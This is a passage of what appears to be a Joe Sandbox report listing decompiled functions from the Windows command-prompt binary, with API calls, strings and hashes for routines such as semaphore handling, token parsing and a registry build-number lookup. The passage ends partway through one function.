                                    • Instruction ID: 6b238cb15df7aefa38a59d2d1356d3b57867e851cb587cb24cbcd8520b147d85
                                    • Opcode Fuzzy Hash: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
                                    • Instruction Fuzzy Hash: D2412335A002158BDF28DFA898587BA77B2EF48740B59006DEB06EB354EB659D43C381
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F2BF0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E011F2BF0(void* __ecx, int* _a4) {
				void* _v0;
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short* _t25;
				void* _t30;
				void* _t38;
				WCHAR* _t40;
				int* _t41;
				void* _t46;
				void* _t50;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t22 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t22 ^ _t59;
				_t41 = _a4;
				 *_t41 = 0;
				_t41[1] = 0;
				E011E1040( &_v528, 0x104, __ecx);
				_t52 = 0x104;
				_t25 =  &_v528;
				while( *_t25 != 0) {
					_t25 = _t25 + 2;
					_t52 = _t52 - 1;
					if(_t52 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t46 =  ~_t52 & 0x00000104 - _t52;
				if(_t52 != 0) {
					_t40 =  &(( &_v528)[_t46]);
					_t58 = 0x104 - _t46;
					if(_t58 == 0) {
						L11:
						_t40 = _t40 - 2;
					} else {
						_t50 = 0x7ffffffe;
						_t52 = L"_p0" - _t40;
						while(_t50 != 0) {
							_t55 =  *(_t40 + _t52) & 0x0000ffff;
							if(_t55 == 0) {
								break;
							} else {
								 *_t40 = _t55;
								_t50 = _t50 - 1;
								_t40 =  &(_t40[1]);
								_t58 = _t58 - 1;
								if(_t58 != 0) {
									continue;
								} else {
									goto L11;
								}
							}
							goto L12;
						}
						if(_t58 == 0) {
							goto L11;
						}
					}
					L12:
					_t46 = 0;
					 *_t40 = 0;
				}
				_t57 = OpenSemaphoreW(0x1f0003, 0,  &_v528);
				_v532 = _t57;
				if(_t57 != 0) {
					_t52 =  &_v536;
					_v536 = 0;
					_t46 = _t57;
					_t30 = E011F213A(_t46, _t52);
					_t54 = _t30;
					if(_t30 >= 0) {
						asm("cdq");
						 *_t41 = _v536;
						_t41[1] = _t52;
						goto L19;
					} else {
						_t46 = _v0;
						_t52 = 0xce;
						E011F292C("wil", _t54);
						_t57 = _v532;
					}
				} else {
					if(GetLastError() == 2) {
						L19:
						_t54 = 0;
					} else {
						_t46 = _v0;
						_t52 = 0xc8;
						_t38 = E011F2913("wil");
						_t57 = _v532;
						_t54 = _t38;
					}
				}
				if(_t57 != 0 && CloseHandle(_t57) == 0) {
					_push(_t46);
					_t52 = 0x879;
					E011F2D56();
				}
				return E011E6FD0(_t54, _t41, _v8 ^ _t59, _t52, _t54, _t57);
			}
























                                    0x011f2bfb
                                    0x011f2c02
                                    0x011f2c06
                                    0x011f2c11
                                    0x011f2c19
                                    0x011f2c26
                                    0x011f2c2b
                                    0x011f2c2d
                                    0x011f2c33
                                    0x011f2c39
                                    0x011f2c3c
                                    0x011f2c3f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f2c3f
                                    0x011f2c49
                                    0x011f2c4b
                                    0x011f2c4f
                                    0x011f2c57
                                    0x011f2c5a
                                    0x011f2c5c
                                    0x011f2c8f
                                    0x011f2c8f
                                    0x011f2c5e
                                    0x011f2c63
                                    0x011f2c68
                                    0x011f2c70
                                    0x011f2c74
                                    0x011f2c7b
                                    0x00000000
                                    0x011f2c7d
                                    0x011f2c7d
                                    0x011f2c80
                                    0x011f2c81
                                    0x011f2c84
                                    0x011f2c87
                                    0x00000000
                                    0x011f2c89
                                    0x00000000
                                    0x011f2c89
                                    0x011f2c87
                                    0x00000000
                                    0x011f2c7b
                                    0x011f2c8d
                                    0x00000000
                                    0x00000000
                                    0x011f2c8d
                                    0x011f2c92
                                    0x011f2c92
                                    0x011f2c94
                                    0x011f2c94
                                    0x011f2cab
                                    0x011f2cad
                                    0x011f2cb5
                                    0x011f2cde
                                    0x011f2ce4
                                    0x011f2cee
                                    0x011f2cf0
                                    0x011f2cf5
                                    0x011f2cf9
                                    0x011f2d1c
                                    0x011f2d1d
                                    0x011f2d1f
                                    0x00000000
                                    0x011f2cfb
                                    0x011f2cfb
                                    0x011f2cfe
                                    0x011f2d09
                                    0x011f2d0e
                                    0x011f2d0e
                                    0x011f2cb7
                                    0x011f2cc0
                                    0x011f2d22
                                    0x011f2d22
                                    0x011f2cc2
                                    0x011f2cc2
                                    0x011f2cc5
                                    0x011f2ccf
                                    0x011f2cd4
                                    0x011f2cda
                                    0x011f2cda
                                    0x011f2cc0
                                    0x011f2d26
                                    0x011f2d33
                                    0x011f2d37
                                    0x011f2d3c
                                    0x011f2d3c
                                    0x011f2d53

                                    APIs
                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 011F2CA5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F2CB7
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011F2D29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastOpenSemaphore
                                    • String ID: _p0$wil
                                    • API String ID: 3419097560-1814513734
                                    • Opcode ID: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                    • Instruction ID: 5ef3c9a16b988b78459f583e3ef312d357a3e061fc114252ff7629f96343635a
                                    • Opcode Fuzzy Hash: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                    • Instruction Fuzzy Hash: 7D411971A001298BDB3DDF68C958BEA37B5EB94710F1582ACDA09DB284DB70CD45CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4588, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 74%
                                    			E011F4588(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short* _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr _t41;
				void* _t47;
				void* _t49;
				intOrPtr* _t50;
				signed int _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t58;
				void* _t59;

				_t33 =  *0x1203834;
				_v20 = __ecx;
				if(_t33 != 0) {
					_t53 = E011DDF40(E011DDEF9(__ecx));
					_v12 = _t53;
					if(_t53 == 0) {
						L2:
						return 1;
					}
					_t47 = 0x20;
					_t23 = E011E2349(_t53, _t47);
					if(_t23 != 0) {
						 *_t23 = 0;
					}
					_t50 = _t53;
					_v16 = 0;
					_t4 = _t50 + 2; // 0x2
					_t38 = _t4;
					do {
						_t24 =  *_t50;
						_t50 = _t50 + 2;
					} while (_t24 != 0);
					_t54 = _t33;
					_t52 = _t50 - _t38 >> 1;
					_v8 = 1;
					_t41 = _t54 + 2;
					do {
						_t25 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t25 != 0);
					_t55 = _t54 - _t41;
					_t56 = _t55 >> 1;
					if(_t55 == 0) {
						L22:
						E011DC5A2(_t41, 0x400023a9, 1, _v20);
						L23:
						E011E0040(_v12);
						return _v8;
					}
					while( *0x11fd544 == 0) {
						if(_t56 < _t52) {
							L15:
							_t41 = _v8;
							L16:
							_t33 = _t33 + _t56 * 2 + 2;
							_t57 = _t33;
							_t49 = _t57 + 2;
							do {
								_t25 =  *_t57;
								_t57 = _t57 + 2;
							} while (_t25 != _v16);
							_t58 = _t57 - _t49;
							_t56 = _t58 >> 1;
							if(_t58 != 0) {
								continue;
							}
							L21:
							if(_t41 == 0) {
								goto L23;
							}
							goto L22;
						}
						__imp___wcsnicmp(_t33, _v12, _t52);
						_t59 = _t59 + 0xc;
						if(_t25 != 0) {
							goto L15;
						}
						_push(_t33);
						E011E25D9(L"%s\r\n");
						_t41 = 0;
						_v8 = 0;
						goto L16;
					}
					_t41 = _v8;
					goto L21;
				}
				_push("Null environment");
				fprintf(E011E7721(__ecx, 2), "\nCMD Internal Error %s\n");
				goto L2;
			}
























                                    0x011f4591
                                    0x011f4599
                                    0x011f45a0
                                    0x011f45d2
                                    0x011f45d4
                                    0x011f45d9
                                    0x011f45be
                                    0x00000000
                                    0x011f45c0
                                    0x011f45dd
                                    0x011f45e0
                                    0x011f45e7
                                    0x011f45eb
                                    0x011f45eb
                                    0x011f45ee
                                    0x011f45f2
                                    0x011f45f5
                                    0x011f45f5
                                    0x011f45f8
                                    0x011f45f8
                                    0x011f45fb
                                    0x011f45fe
                                    0x011f4605
                                    0x011f4609
                                    0x011f460c
                                    0x011f460f
                                    0x011f4612
                                    0x011f4612
                                    0x011f4615
                                    0x011f4618
                                    0x011f461d
                                    0x011f461f
                                    0x011f4621
                                    0x011f4681
                                    0x011f468b
                                    0x011f4693
                                    0x011f4696
                                    0x00000000
                                    0x011f469b
                                    0x011f4623
                                    0x011f462e
                                    0x011f4658
                                    0x011f4658
                                    0x011f465b
                                    0x011f465e
                                    0x011f4661
                                    0x011f4663
                                    0x011f4666
                                    0x011f4666
                                    0x011f4669
                                    0x011f466c
                                    0x011f4672
                                    0x011f4674
                                    0x011f4676
                                    0x00000000
                                    0x00000000
                                    0x011f467d
                                    0x011f467f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f467f
                                    0x011f4635
                                    0x011f463b
                                    0x011f4640
                                    0x00000000
                                    0x00000000
                                    0x011f4642
                                    0x011f4648
                                    0x011f4651
                                    0x011f4653
                                    0x00000000
                                    0x011f4653
                                    0x011f467a
                                    0x00000000
                                    0x011f467a
                                    0x011f45a2
                                    0x011f45b5
                                    0x00000000

                                    APIs
                                    • _wcsnicmp.MSVCRT ref: 011F4635
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F45B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: __iob_func_wcsnicmpfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 1828771275-2781220306
                                    • Opcode ID: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                    • Instruction ID: 5ff6aa4390d4c47a6fd76ce5ab5c55080b935e425ef280e3173e00a2876c3549
                                    • Opcode Fuzzy Hash: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                    • Instruction Fuzzy Hash: 90315D36E00211DBCF3CEFAC98496AFB7A4EF94614F05056DEE1AA3A40EB705E01C785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D68D9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E011D68D9(void* __ecx, intOrPtr __edx, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t16;
				signed int _t19;
				signed int _t21;
				intOrPtr _t24;
				signed int _t38;
				long _t40;
				signed short* _t44;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t44 = E011DDEF9(__ecx);
				_t16 =  *_t44 & 0x0000ffff;
				if(_t16 != 0x3a) {
					if(_t16 != 0x2b) {
						goto L2;
					} else {
						goto L1;
					}
					L10:
					_t19 = _v8;
					 *((short*)(_v12 + _t19 * 2)) = 0;
					return _t19;
					L17:
				} else {
					L1:
					_t44 =  &(_t44[1]);
				}
				L2:
				_t24 = _a8;
				if(_t24 == 0) {
					_t44 = E011DDEF9(_t44);
				}
				_v8 = _v8 & 0x00000000;
				_t40 =  *_t44 & 0x0000ffff;
				while(_t24 == 0 || wcschr(L"=,;", _t40) == 0) {
					if(wcschr(L"+:\n\r\t ", _t40) == 0) {
						if(_t24 == 0) {
							if(E011DD7D4(L"&<|>", _t40) == 0) {
								if(_t40 != 0x5e) {
									goto L8;
								} else {
									_t44 =  &(_t44[1]);
									_t38 =  *_t44 & 0x0000ffff;
									goto L9;
								}
								goto L17;
							}
						} else {
							L8:
							_t38 = _t40 & 0x0000ffff;
							L9:
							_t32 = _v8;
							_t44 =  &(_t44[1]);
							_t7 = _t32 + 1; // 0x1
							_t21 = _t7;
							 *(_v12 + _v8 * 2) = _t38;
							_t40 =  *_t44 & 0x0000ffff;
							_v8 = _t21;
							if(_t21 < 0x7f) {
								continue;
							}
						}
					}
					goto L10;
				}
				goto L10;
			}












                                    0x011d68de
                                    0x011d68df
                                    0x011d68e3
                                    0x011d68eb
                                    0x011d68ed
                                    0x011d68f3
                                    0x011d6970
                                    0x00000000
                                    0x011d6972
                                    0x00000000
                                    0x011d6972
                                    0x011d6958
                                    0x011d6958
                                    0x011d6963
                                    0x011d696a
                                    0x00000000
                                    0x011d68f5
                                    0x011d68f5
                                    0x011d68f5
                                    0x011d68f5
                                    0x011d68f8
                                    0x011d68f8
                                    0x011d68fd
                                    0x011ebe67
                                    0x011ebe67
                                    0x011d6903
                                    0x011d6907
                                    0x011d690a
                                    0x011d6930
                                    0x011d6934
                                    0x011ebe7c
                                    0x011ebe86
                                    0x00000000
                                    0x011ebe8c
                                    0x011ebe8c
                                    0x011ebe8f
                                    0x00000000
                                    0x011ebe8f
                                    0x00000000
                                    0x011ebe86
                                    0x011d693a
                                    0x011d693a
                                    0x011d693a
                                    0x011d693d
                                    0x011d693d
                                    0x011d6940
                                    0x011d6946
                                    0x011d6946
                                    0x011d6949
                                    0x011d694d
                                    0x011d6950
                                    0x011d6956
                                    0x00000000
                                    0x00000000
                                    0x011d6956
                                    0x011d6934
                                    0x00000000
                                    0x011d6930
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011DDEF9: iswspace.MSVCRT ref: 011DDF07
                                      • Part of subcall function 011DDEF9: wcschr.MSVCRT ref: 011DDF18
                                    • wcschr.MSVCRT ref: 011D6914
                                    • wcschr.MSVCRT ref: 011D6926
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID: &<|>$+: $=,;
                                    • API String ID: 3458554142-2256444845
                                    • Opcode ID: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                    • Instruction ID: a9fe4d00383210e98b869d9fe7eb476e0939fec3fc86c21e78e800352c0d37be
                                    • Opcode Fuzzy Hash: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                    • Instruction Fuzzy Hash: F5213672A44266EECB3C8B6AD4146BEB7E6EFA5624B25406EE9C4D7281FB315C40C350
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D4476, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011D4476() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				long _t17;
				int _t20;

				_t20 = 4;
				_v16 = _t20;
				if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x2000000,  &_v8) != 0) {
					L5:
					return 0;
				}
				_v12 = _t20;
				_t17 = RegQueryValueExW(_v8, L"UBR", 0,  &_v12,  &_v20,  &_v16);
				RegCloseKey(_v8);
				if(_t17 != 0 || _v12 != _t20) {
					goto L5;
				} else {
					return _v20;
				}
			}









                                    0x011d4481
                                    0x011d4485
                                    0x011d44a2
                                    0x011d44e1
                                    0x00000000
                                    0x011d44e1
                                    0x011d44a8
                                    0x011d44be
                                    0x011d44c9
                                    0x011d44d2
                                    0x00000000
                                    0x011d44d9
                                    0x00000000
                                    0x011d44d9

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,011F731D,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D449A
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,UBR,00000000,?,?,011D444F,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44BE
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44C9
                                    Strings
                                    • UBR, xrefs: 011D44B6
                                    • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 011D4490
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                    • API String ID: 3677997916-3870813718
                                    • Opcode ID: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                    • Instruction ID: cf61cfdaed9bdab0fba005ebbc4d1a8afd27dee39561569764b46a22f792f7b7
                                    • Opcode Fuzzy Hash: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                    • Instruction Fuzzy Hash: 2D011D76A80218BBDF32DA95EC49FEEBBBCEB84710F140166E901A2541D7705A90DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E465D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 38%
                                    			E011E465D(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				int _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t3 ^ _t20;
				_t18 =  *0x11fd5f8; // 0x0
				if(_t18 != 0) {
					L6:
					 *0x12194b4(0);
					_t6 =  *_t18();
					L7:
					_pop(_t19);
					return E011E6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
				}
				_t8 =  *0x11fd0d0; // 0xffffffff
				if(_t8 != 0xffffffff) {
					L3:
					if(_t8 != 0) {
						_t18 = GetProcAddress(_t8, "SetThreadUILanguage");
						 *0x11fd5f8 = _t18;
					}
					L5:
					if(_t18 == 0) {
						_t6 = SetThreadLocale(0x409);
						goto L7;
					}
					goto L6;
				}
				_t8 = GetModuleHandleW(L"KERNEL32.DLL");
				_t18 =  *0x11fd5f8; // 0x0
				 *0x11fd0d0 = _t8;
				if(_t8 == 0xffffffff) {
					goto L5;
				}
				goto L3;
			}














                                    0x011e4662
                                    0x011e4663
                                    0x011e466a
                                    0x011e466e
                                    0x011e4676
                                    0x011e46bd
                                    0x011e46c1
                                    0x011e46c7
                                    0x011e46c9
                                    0x011e46ce
                                    0x011e46d7
                                    0x011e46d7
                                    0x011e4678
                                    0x011e4680
                                    0x011e469d
                                    0x011e469f
                                    0x011e46ad
                                    0x011e46af
                                    0x011e46af
                                    0x011e46b5
                                    0x011e46b7
                                    0x011ee8ad
                                    0x00000000
                                    0x011ee8ad
                                    0x00000000
                                    0x011e46b7
                                    0x011e4687
                                    0x011e468d
                                    0x011e4693
                                    0x011e469b
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1646373207-2530943252
                                    • Opcode ID: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                    • Instruction ID: 3b5fc911d88dba34504388ba82aaf093f55f1a55b3758242c60c83724ef66324
                                    • Opcode Fuzzy Hash: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                    • Instruction Fuzzy Hash: 6601A730940614DBCB3C9BA8B81CB693BE49B58A2DB05026DF936DB284CF705C819B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E1F52, Relevance: 7.8, APIs: 5, Instructions: 293COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E011E1F52(void* __ebx, wchar_t* __ecx, wchar_t* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t92;
				void* _t104;
				void* _t108;
				wchar_t* _t110;
				wchar_t** _t111;
				long _t117;
				short* _t118;
				void _t121;
				void* _t123;
				long _t128;
				wchar_t* _t130;
				wchar_t* _t137;
				void* _t146;
				wchar_t** _t155;
				wchar_t** _t158;
				void _t164;
				wchar_t* _t168;
				void _t171;
				intOrPtr _t175;
				long* _t180;
				void* _t188;
				signed int _t191;
				void _t199;
				void* _t203;
				void* _t204;
				wchar_t** _t205;
				long* _t206;
				void* _t207;
				wchar_t* _t209;
				long* _t217;
				void _t218;
				signed int _t220;
				wchar_t* _t223;
				void _t224;
				wchar_t* _t225;
				void* _t226;

				_push(0xc0);
				_push(0x11fbdb8);
				E011E75CC(__ebx, __edi, __esi);
				_t216 = __edx;
				_t223 = __ecx;
				 *(_t226 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t226 - 0xc4)) = __edx;
				_t92 =  *(_t226 + 0xc);
				 *(_t226 - 0xc0) = _t92;
				 *(_t226 - 0xb8) = _t92;
				 *((intOrPtr*)(_t226 - 0xb4)) = 0x90;
				 *((intOrPtr*)(_t226 - 0xb0)) = 5;
				memset(_t226 - 0xac, 0, 0x88);
				 *((intOrPtr*)(_t226 - 0xcc)) = 0;
				_t155 =  *0x1213cc4;
				_t155[0xc] = 0;
				 *0x11fd0da = 0;
				 *((intOrPtr*)(_t226 - 4)) = 0;
				 *(_t226 - 0xac) =  *(_t226 - 0xc0);
				_push(0x3a);
				if( *0x1213cc9 == 0) {
					_pop(_t224);
				} else {
					_pop(_t224);
					if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x38)))) == _t224) {
						 *(_t226 - 0xac) =  *(_t155[0x44]);
					}
				}
				if(E011E7797(_t155) == 0) {
					_t157 = 1;
					goto L5;
				} else {
					 *((intOrPtr*)(_t226 - 0xc8)) = 0;
					_t146 =  *0x121c010(_t226 - 0xb4, _t226 - 0xcc,  &(( *0x1213cc4)[0xc]), _t216, _t226 - 0xc8);
					_t157 = 1;
					if(_t146 == 1) {
						__eflags =  *((intOrPtr*)(_t226 - 0xc8)) - 1;
						if( *((intOrPtr*)(_t226 - 0xc8)) == 1) {
							_push(0);
							_push(0x4ec);
							E011DC5A2(1);
							_t157 = 1;
							__eflags = 1;
						}
						 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
						L35:
						return E011E7614(0, _t216, _t224);
					}
					L5:
					 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
					_t199 =  *(_t226 - 0xc0);
					 *0x11fd0da = _t157;
					_t158 =  *0x1213cc4;
					_t158[2] = 0;
					 *_t158 = _t216;
					_t97 =  *(_t226 + 8);
					_t158[1] =  *(_t226 + 8);
					if( *0x1213cc9 == 0) {
						L38:
						__eflags = E011E2D22(_t216, _t97, _t199);
						if(__eflags == 0) {
							L8:
							_t216 = 0x2000;
							E011E2A7C(_t226 - 0xc0, 0x2000, _t235);
							_t224 =  *(_t226 - 0xc0);
							if(_t224 == 0) {
								_push(0);
								L47:
								__imp__??_V@YAXPAX@Z();
								L48:
								goto L35;
							}
							E011E1040(_t224, 0x2000, ( *(_t226 - 0xbc))[0xe]);
							_t164 = _t224;
							_t203 = _t164 + 2;
							do {
								_t104 =  *_t164;
								_t164 = _t164 + 2;
							} while (_t104 != 0);
							_t168 = _t224 + ((_t164 - _t203 >> 1) + 1) * 2;
							 *(_t226 - 0xb8) = _t168;
							 *_t168 = 0;
							_t106 =  *(_t226 - 0xbc);
							if(( *(_t226 - 0xbc))[0xf] != 0) {
								_t216 = 0x2000 - (_t168 - _t224 >> 1);
								E011E1040(_t168, 0x2000, _t106[0xf]);
							}
							E011E2A06(( *0x1213cc4)[3], _t216);
							_t171 = _t224;
							_t204 = _t171 + 2;
							do {
								_t108 =  *_t171;
								_t171 = _t171 + 2;
							} while (_t108 != 0);
							( *0x1213cc4)[0x19] = _t171 - _t204 >> 1;
							_t110 = E011DDF40(_t224);
							_t205 =  *0x1213cc4;
							_t205[0xf] = _t110;
							if(_t110 == 0) {
								L49:
								_push(_t224);
								goto L47;
							}
							_t205[0x23] = _t110;
							_t111 =  &(_t205[0x1a]);
							_t175 = 9;
							 *((intOrPtr*)(_t226 - 0xc4)) = _t175;
							do {
								 *((intOrPtr*)(_t111 - 0x28)) = 0;
								 *_t111 = 0;
								_t111 =  &(_t111[1]);
								_t175 = _t175 - 1;
							} while (_t175 != 0);
							_t216 =  *(_t226 - 0xb8);
							if( *_t216 == 0) {
								_t205[0xe] = 0;
								_t205[0xd] = 0;
								L34:
								_t205[4] =  *0x1213cd8;
								__imp__??_V@YAXPAX@Z(_t224);
								goto L35;
							}
							_t206 = E011DDF40(_t216 + wcsspn(_t216, L" \t") * 2);
							( *0x1213cc4)[0xd] = _t206;
							if(_t206 == 0) {
								goto L49;
							}
							_t180 = _t206;
							_t56 =  &(_t180[0]); // 0x2
							_t216 = _t56;
							do {
								_t117 =  *_t180;
								_t180 =  &(_t180[0]);
							} while (_t117 != 0);
							_t118 = _t206 + (_t180 - _t216 >> 1) * 2;
							while(_t118 != _t206) {
								_t191 =  *(_t118 - 2) & 0x0000ffff;
								if(_t191 == 0x20 || _t191 ==  *((intOrPtr*)(_t226 - 0xc4))) {
									_t118 = _t118 + 0xfffffffe;
									continue;
								} else {
									break;
								}
							}
							 *_t118 = 0;
							if( *0x1213cc9 == 0) {
								_t217 = ( *0x1213cc4)[0xd];
								while(1) {
									_t207 = 0x2f;
									_t216 = E011DD7D4(_t217, _t207);
									 *(_t226 - 0xb8) = _t216;
									__eflags = _t216;
									if(_t216 == 0) {
										goto L27;
									}
									_t217 =  &(_t216[0]);
									_t128 = towupper( *_t217 & 0x0000ffff);
									__eflags = _t128 - 0x51;
									if(_t128 != 0x51) {
										continue;
									}
									 *0x11fd0c8 = 0;
									_t190 =  *(_t226 - 0xb8);
									_t209 =  *(_t226 - 0xb8);
									 *(_t226 - 0xb8) =  &(_t209[0]);
									do {
										_t130 =  *_t209;
										_t209 =  &(_t209[0]);
										__eflags = _t130;
									} while (_t130 != 0);
									_t90 =  &(_t217[0]); // 0x0
									E011E1040(_t190, (_t209 -  *(_t226 - 0xb8) >> 1) + 1, _t90);
									goto L27;
								}
							}
							L27:
							_t121 = E011DEA40(( *0x1213cc4)[0xd], 0, 0);
							 *(_t226 - 0xc0) = _t121;
							_t205 =  *0x1213cc4;
							if( *_t121 == 0) {
								L33:
								_t205[0xe] = _t121;
								goto L34;
							}
							_t216 =  &(_t205[0x1a]);
							 *(_t226 - 0xbc) = _t216;
							_t188 = 1;
							while(_t188 < 0xa) {
								 *(_t216 - 0x28) = _t121;
								_t218 = _t121;
								_t66 = _t218 + 2; // 0x2
								 *(_t226 - 0xb8) = _t66;
								do {
									_t123 =  *_t218;
									_t218 = _t218 + 2;
								} while (_t123 != 0);
								_t220 = _t218 -  *(_t226 - 0xb8) >> 1;
								 *( *(_t226 - 0xbc)) = _t220;
